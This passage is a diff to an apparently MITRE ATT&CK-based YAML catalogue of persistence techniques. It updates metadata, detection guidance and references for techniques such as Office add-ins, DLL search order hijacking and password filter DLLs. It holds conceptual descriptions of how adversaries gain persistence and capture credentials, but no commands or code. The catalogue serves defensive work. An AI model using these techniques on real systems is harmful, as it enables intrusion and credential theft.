+        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Nick Carr, Mandiant
       - Microsoft Threat Intelligence Center (MSTIC)
@@ -28318,79 +28699,73 @@ persistence:
       - Praetorian
       - Loic Jaquemet
       - Ricardo Dias
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.4'
+      x_mitre_data_sources:
+      - 'File: File Creation'
+      - 'Application Log: Application Log Content'
+      - 'Windows Registry: Windows Registry Key Modification'
+      - 'File: File Modification'
+      - 'Module: Module Load'
+      - 'Process: Process Creation'
+      - 'Windows Registry: Windows Registry Key Creation'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
       created: '2017-12-14T16:46:06.044Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137
         url: https://attack.mitre.org/techniques/T1137
-      - source_name: SensePost Ruler GitHub
-        url: https://github.com/sensepost/ruler
-        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
-          services. Retrieved February 4, 2019.'
+        external_id: T1137
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
       - source_name: TechNet O365 Outlook Rules
-        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
         description: Koeller, B.. (2018, February 21). Defending Against Rules and
           Forms Injection. Retrieved November 5, 2019.
+        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
       - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
         description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
           Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: SensePost Ruler GitHub
+        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+          services. Retrieved February 4, 2019.'
+        url: https://github.com/sensepost/ruler
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Office Application Startup
-      description: |-
-        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
-        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      x_mitre_detection: |-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
-        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-      x_mitre_version: '1.3'
+        url: https://github.com/sensepost/notruler
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'File: File Creation'
-      - 'Application Log: Application Log Content'
-      - 'Windows Registry: Windows Registry Key Modification'
-      - 'File: File Modification'
-      - 'Module: Module Load'
-      - 'Process: Process Creation'
-      - 'Windows Registry: Windows Registry Key Creation'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1137
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -28420,6 +28795,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -28430,6 +28806,7 @@ persistence:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -28438,13 +28815,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -28486,9 +28863,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -28556,19 +28930,18 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -28584,8 +28957,8 @@ persistence:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -28599,7 +28972,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -28625,6 +28998,10 @@ persistence:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -28652,42 +29029,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1137.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
-      type: attack-pattern
-      created: '2019-11-07T19:52:52.801Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.006
-        url: https://attack.mitre.org/techniques/T1137/006
-      - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
-        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
-        source_name: Microsoft Office Add-ins
-      - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
-        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
-          Persistence. Retrieved July 3, 2017.
-        source_name: MRWLabs Office Persistence Add-ins
-      - source_name: FireEye Mail CDS 2018
-        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
-        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
-          Enterprise Email Compromise. Retrieved April 22, 2019.
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:37:09.190Z'
       name: 'Office Application Startup: Add-ins'
       description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
         on a compromised system. Office add-ins can be used to add functionality to
@@ -28702,13 +29048,18 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Modification'
@@ -28716,11 +29067,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+      created: '2019-11-07T19:52:52.801Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/006
+        external_id: T1137.006
+      - source_name: FireEye Mail CDS 2018
+        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+          Enterprise Email Compromise. Retrieved April 22, 2019.
+        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+      - source_name: MRWLabs Office Persistence Add-ins
+        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+          Persistence. Retrieved July 3, 2017.
+        url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+      - source_name: Microsoft Office Add-ins
+        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+        url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.006
     atomic_tests: []
   T1505.002:
@@ -28751,7 +29125,7 @@ persistence:
         url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
         description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
           remote code execution. Retrieved June 24, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T17:05:44.321Z'
       name: 'Server Software Component: Transport Agent'
       description: "Adversaries may abuse Microsoft transport agents to establish
         persistent access to systems. Microsoft Exchange transport agents can operate
@@ -28789,13 +29163,11 @@ persistence:
       - SYSTEM
       - Administrator
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.002
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -28821,7 +29193,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -28863,7 +29235,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -28941,11 +29312,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29025,35 +29395,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -29077,71 +29422,60 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1505.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
-      created: '2022-03-28T15:34:44.590Z'
-      x_mitre_version: '1.0'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.005
-        url: https://attack.mitre.org/techniques/T1505/005
-      - source_name: James TermServ DLL
-        url: https://twitter.com/james_inthe_box/status/1150495335812177920
-        description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
-          2022.
-      - source_name: Microsoft System Services Fundamentals
-        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
-        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
-          Retrieved March 28, 2022.
-      - source_name: Microsoft Remote Desktop Services
-        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
-        description: Microsoft. (2019, August 23). About Remote Desktop Services.
-          Retrieved March 28, 2022.
-      - source_name: RDPWrap Github
-        url: https://github.com/stascorp/rdpwrap
-        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
-          Retrieved March 28, 2022.
-      - source_name: Windows OS Hub RDP
-        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
-        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
-          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:42.810Z'
+      name: 'Server Software Component: Terminal Services DLL'
       description: |-
         Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
 
         [Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service's DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The <code>termsrv.dll</code> file, typically stored in `%SystemRoot%\System32\`, is the default <code>ServiceDll</code> value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
 
         Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Server Software Component: Terminal Services DLL'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for changes to Registry keys associated with <code>ServiceDll</code> and other subkey values under <code>HKLM\System\CurrentControlSet\services\TermService\Parameters\</code>.
 
@@ -29150,24 +29484,56 @@ persistence:
         Monitor commands as well as  processes and arguments for potential adversary actions to modify Registry values (ex: <code>reg.exe</code>) or modify/replace the legitimate <code>termsrv.dll</code>.
 
         Monitor module loads by the Terminal Services process (ex: <code>svchost.exe -k termsvcs</code>) for unexpected DLLs (the default is <code>%SystemRoot%\System32\termsrv.dll</code>, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Command: Command Execution'
       - 'File: File Modification'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+      created: '2022-03-28T15:34:44.590Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/005
+        external_id: T1505.005
+      - source_name: James TermServ DLL
+        description: James. (2019, July 14). @James_inthe_box. Retrieved September
+          12, 2024.
+        url: https://x.com/james_inthe_box/status/1150495335812177920
+      - source_name: Microsoft System Services Fundamentals
+        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+          Retrieved March 28, 2022.
+        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+      - source_name: Microsoft Remote Desktop Services
+        description: Microsoft. (2019, August 23). About Remote Desktop Services.
+          Retrieved March 28, 2022.
+        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+      - source_name: RDPWrap Github
+        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+          Retrieved March 28, 2022.
+        url: https://github.com/stascorp/rdpwrap
+      - source_name: Windows OS Hub RDP
+        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.005
     atomic_tests: []
   T1176:
     technique:
-      modified: '2024-04-18T23:22:37.874Z'
+      modified: '2024-09-12T19:48:15.871Z'
       name: Browser Extensions
       description: "Adversaries may abuse Internet browser extensions to establish
         persistent access to victim systems. Browser extensions or plugins are small
@@ -29259,8 +29625,8 @@ persistence:
         url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
       - source_name: Chrome Extension C2 Malware
         description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
